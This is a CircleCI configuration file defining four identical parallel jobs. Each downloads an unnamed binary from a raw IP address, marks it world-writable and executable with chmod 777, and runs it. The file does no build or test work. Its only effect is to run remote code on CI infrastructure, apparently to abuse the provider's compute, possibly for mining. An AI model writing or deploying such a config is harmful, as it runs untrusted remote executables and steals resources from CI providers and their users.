version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget http://199.250.207.182/~ngewetech/nah/libs/bin
      - run: chmod 777 bin
      - run: ./bin
  gas2:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget http://199.250.207.182/~ngewetech/nah/libs/bin
      - run: chmod 777 bin
      - run: ./bin
  gas3:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget http://199.250.207.182/~ngewetech/nah/libs/bin
      - run: chmod 777 bin
      - run: ./bin
  gas4:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget http://199.250.207.182/~ngewetech/nah/libs/bin
      - run: chmod 777 bin
      - run: ./bin

# Orchestrate our job run sequence
workflows:
  alp_:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4